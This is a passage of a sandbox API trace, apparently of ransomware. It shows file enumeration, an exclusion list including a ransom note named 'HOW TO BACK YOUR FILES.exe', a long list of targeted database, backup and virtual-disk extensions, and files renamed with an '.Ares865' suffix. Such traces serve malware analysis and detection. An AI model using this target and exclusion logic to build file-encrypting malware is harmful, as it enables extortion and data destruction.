szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.625] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.625] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0087.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0087.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.625] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0087.626] CloseHandle (hObject=0x15c) returned 1 [0087.626] CloseHandle (hObject=0x118) returned 1 [0087.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.626] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.627] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2ced60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".") returned 1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="..") returned 1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="windows") returned -1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="temp") returned -1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="boot") returned 1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="perflogs") returned -1 [0087.627] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0087.627] lstrlenW (lpString="MSOINTL.REST.trx_dll") returned 20 [0087.627] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 71 [0087.628] lstrcpyW (in: lpString1=0x2cce468, lpString2="MSOINTL.REST.trx_dll" | out: lpString1="MSOINTL.REST.trx_dll") returned="MSOINTL.REST.trx_dll" [0087.628] lstrlenW (lpString="MSOINTL.REST.trx_dll") returned 20 [0087.628] lstrlenW (lpString="Ares865") returned 7 [0087.628] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.628] lstrlenW (lpString=".dll") returned 4 [0087.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".dll") returned 1 [0087.628] lstrlenW (lpString=".lnk") returned 4 [0087.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".lnk") returned 1 [0087.628] lstrlenW (lpString=".ini") returned 4 [0087.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".ini") returned 1 [0087.628] lstrlenW (lpString=".sys") returned 4 [0087.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2=".sys") returned 1 [0087.628] lstrlenW (lpString="MSOINTL.REST.trx_dll") returned 20 [0087.628] lstrlenW (lpString="bak") returned 3 [0087.628] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.628] lstrlenW (lpString="ba_") returned 3 [0087.628] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.628] lstrlenW (lpString="dbb") returned 3 [0087.628] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.628] lstrlenW (lpString="vmdk") returned 4 [0087.628] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.628] lstrlenW (lpString="rar") returned 3 [0087.628] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.628] lstrlenW (lpString="zip") returned 3 [0087.628] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.628] lstrlenW (lpString="tgz") returned 3 [0087.628] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.628] lstrlenW (lpString="vbox") returned 4 [0087.628] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.628] lstrlenW (lpString="vdi") returned 3 [0087.628] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.628] lstrlenW (lpString="vhd") returned 3 [0087.628] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.628] lstrlenW (lpString="vhdx") returned 4 [0087.628] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.628] lstrlenW (lpString="avhd") returned 4 [0087.628] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.628] lstrlenW (lpString="db") returned 2 [0087.629] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.629] lstrlenW (lpString="db2") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.629] lstrlenW (lpString="db3") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.629] lstrlenW (lpString="dbf") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.629] lstrlenW (lpString="mdf") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.629] lstrlenW (lpString="mdb") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.629] lstrlenW (lpString="sql") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.629] lstrlenW (lpString="sqlite") returned 6 [0087.629] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.629] lstrlenW (lpString="sqlite3") returned 7 [0087.629] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.629] lstrlenW (lpString="sqlitedb") returned 8 [0087.629] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.629] lstrlenW (lpString="xml") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.629] lstrlenW (lpString="$er") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.629] lstrlenW (lpString="4dd") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.629] lstrlenW (lpString="4dl") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.629] lstrlenW (lpString="^^^") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.629] lstrlenW (lpString="abs") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.629] lstrlenW (lpString="abx") returned 3 [0087.629] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.629] lstrlenW (lpString="accdb") returned 5 [0087.629] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.629] lstrlenW (lpString="accdc") returned 5 [0087.629] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.629] lstrlenW (lpString="accde") returned 5 [0087.630] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.630] lstrlenW (lpString="accdr") returned 5 [0087.630] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.630] lstrlenW (lpString="accdt") returned 5 [0087.630] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.630] lstrlenW (lpString="accdw") returned 5 [0087.630] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.630] lstrlenW (lpString="accft") returned 5 [0087.630] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.630] lstrlenW (lpString="adb") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.630] lstrlenW (lpString="adb") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.630] lstrlenW (lpString="ade") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.630] lstrlenW (lpString="adf") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.630] lstrlenW (lpString="adn") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.630] lstrlenW (lpString="adp") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.630] lstrlenW (lpString="alf") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.630] lstrlenW (lpString="ask") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.630] lstrlenW (lpString="btr") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.630] lstrlenW (lpString="cat") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.630] lstrlenW (lpString="cdb") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.630] lstrlenW (lpString="ckp") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.630] lstrlenW (lpString="cma") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.630] lstrlenW (lpString="cpd") returned 3 [0087.630] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.630] lstrlenW (lpString="dacpac") returned 6 [0087.630] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.631] lstrlenW (lpString="dad") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.631] lstrlenW (lpString="dadiagrams") returned 10 [0087.631] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0087.631] lstrlenW (lpString="daschema") returned 8 [0087.631] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.631] lstrlenW (lpString="db-journal") returned 10 [0087.631] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0087.631] lstrlenW (lpString="db-shm") returned 6 [0087.631] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.631] lstrlenW (lpString="db-wal") returned 6 [0087.631] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.631] lstrlenW (lpString="dbc") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.631] lstrlenW (lpString="dbs") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.631] lstrlenW (lpString="dbt") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.631] lstrlenW (lpString="dbv") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.631] lstrlenW (lpString="dbx") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.631] lstrlenW (lpString="dcb") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.631] lstrlenW (lpString="dct") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.631] lstrlenW (lpString="dcx") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.631] lstrlenW (lpString="ddl") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.631] lstrlenW (lpString="dlis") returned 4 [0087.631] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.631] lstrlenW (lpString="dp1") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.631] lstrlenW (lpString="dqy") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.631] lstrlenW (lpString="dsk") returned 3 [0087.631] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.632] lstrlenW (lpString="dsn") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.632] lstrlenW (lpString="dtsx") returned 4 [0087.632] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.632] lstrlenW (lpString="dxl") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.632] lstrlenW (lpString="eco") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.632] lstrlenW (lpString="ecx") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.632] lstrlenW (lpString="edb") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.632] lstrlenW (lpString="epim") returned 4 [0087.632] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.632] lstrlenW (lpString="fcd") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.632] lstrlenW (lpString="fdb") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.632] lstrlenW (lpString="fic") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.632] lstrlenW (lpString="flexolibrary") returned 12 [0087.632] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0087.632] lstrlenW (lpString="fm5") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.632] lstrlenW (lpString="fmp") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.632] lstrlenW (lpString="fmp12") returned 5 [0087.632] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.632] lstrlenW (lpString="fmpsl") returned 5 [0087.632] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.632] lstrlenW (lpString="fol") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.632] lstrlenW (lpString="fp3") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.632] lstrlenW (lpString="fp4") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.632] lstrlenW (lpString="fp5") returned 3 [0087.632] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.633] lstrlenW (lpString="fp7") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.633] lstrlenW (lpString="fpt") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.633] lstrlenW (lpString="frm") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.633] lstrlenW (lpString="gdb") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.633] lstrlenW (lpString="gdb") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.633] lstrlenW (lpString="grdb") returned 4 [0087.633] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.633] lstrlenW (lpString="gwi") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.633] lstrlenW (lpString="hdb") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.633] lstrlenW (lpString="his") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.633] lstrlenW (lpString="ib") returned 2 [0087.633] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.633] lstrlenW (lpString="idb") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.633] lstrlenW (lpString="ihx") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.633] lstrlenW (lpString="itdb") returned 4 [0087.633] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.633] lstrlenW (lpString="itw") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.633] lstrlenW (lpString="jet") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.633] lstrlenW (lpString="jtx") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.633] lstrlenW (lpString="kdb") returned 3 [0087.633] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.633] lstrlenW (lpString="kexi") returned 4 [0087.633] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.633] lstrlenW (lpString="kexic") returned 5 [0087.633] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.633] lstrlenW (lpString="kexis") returned 5 [0087.634] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.634] lstrlenW (lpString="lgc") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.634] lstrlenW (lpString="lwx") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.634] lstrlenW (lpString="maf") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.634] lstrlenW (lpString="maq") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.634] lstrlenW (lpString="mar") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.634] lstrlenW (lpString="marshal") returned 7 [0087.634] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.634] lstrlenW (lpString="mas") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.634] lstrlenW (lpString="mav") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.634] lstrlenW (lpString="maw") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.634] lstrlenW (lpString="mdbhtml") returned 7 [0087.634] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.634] lstrlenW (lpString="mdn") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.634] lstrlenW (lpString="mdt") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.634] lstrlenW (lpString="mfd") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.634] lstrlenW (lpString="mpd") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.634] lstrlenW (lpString="mrg") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.634] lstrlenW (lpString="mud") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.634] lstrlenW (lpString="mwb") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.634] lstrlenW (lpString="myd") returned 3 [0087.634] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.634] lstrlenW (lpString="ndf") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.635] lstrlenW (lpString="nnt") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.635] lstrlenW (lpString="nrmlib") returned 6 [0087.635] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.635] lstrlenW (lpString="ns2") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.635] lstrlenW (lpString="ns3") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.635] lstrlenW (lpString="ns4") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.635] lstrlenW (lpString="nsf") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.635] lstrlenW (lpString="nv") returned 2 [0087.635] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.635] lstrlenW (lpString="nv2") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.635] lstrlenW (lpString="nwdb") returned 4 [0087.635] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.635] lstrlenW (lpString="nyf") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.635] lstrlenW (lpString="odb") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.635] lstrlenW (lpString="odb") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.635] lstrlenW (lpString="oqy") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.635] lstrlenW (lpString="ora") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.635] lstrlenW (lpString="orx") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.635] lstrlenW (lpString="owc") returned 3 [0087.635] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.635] lstrlenW (lpString="p96") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.636] lstrlenW (lpString="p97") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.636] lstrlenW (lpString="pan") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.636] lstrlenW (lpString="pdb") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.636] lstrlenW (lpString="pdm") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.636] lstrlenW (lpString="pnz") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.636] lstrlenW (lpString="qry") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.636] lstrlenW (lpString="qvd") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.636] lstrlenW (lpString="rbf") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.636] lstrlenW (lpString="rctd") returned 4 [0087.636] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.636] lstrlenW (lpString="rod") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.636] lstrlenW (lpString="rodx") returned 4 [0087.636] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.636] lstrlenW (lpString="rpd") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.636] lstrlenW (lpString="rsd") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.636] lstrlenW (lpString="sas7bdat") returned 8 [0087.636] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.636] lstrlenW (lpString="sbf") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.636] lstrlenW (lpString="scx") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.636] lstrlenW (lpString="sdb") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.636] lstrlenW (lpString="sdc") returned 3 [0087.636] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.636] lstrlenW (lpString="sdf") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.637] lstrlenW (lpString="sis") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.637] lstrlenW (lpString="spq") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.637] lstrlenW (lpString="te") returned 2 [0087.637] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.637] lstrlenW (lpString="teacher") returned 7 [0087.637] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.637] lstrlenW (lpString="tmd") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.637] lstrlenW (lpString="tps") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.637] lstrlenW (lpString="trc") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.637] lstrlenW (lpString="trc") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.637] lstrlenW (lpString="trm") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.637] lstrlenW (lpString="udb") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.637] lstrlenW (lpString="udl") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.637] lstrlenW (lpString="usr") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.637] lstrlenW (lpString="v12") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.637] lstrlenW (lpString="vis") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.637] lstrlenW (lpString="vpd") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.637] lstrlenW (lpString="vvv") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.637] lstrlenW (lpString="wdb") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.637] lstrlenW (lpString="wmdb") returned 4 [0087.637] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.637] lstrlenW (lpString="wrk") returned 3 [0087.637] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.638] lstrlenW (lpString="xdb") returned 3 [0087.638] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.638] lstrlenW (lpString="xld") returned 3 [0087.638] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.638] lstrlenW (lpString="xmlff") returned 5 [0087.638] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.638] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.Ares865") returned 80 [0087.638] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.639] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all 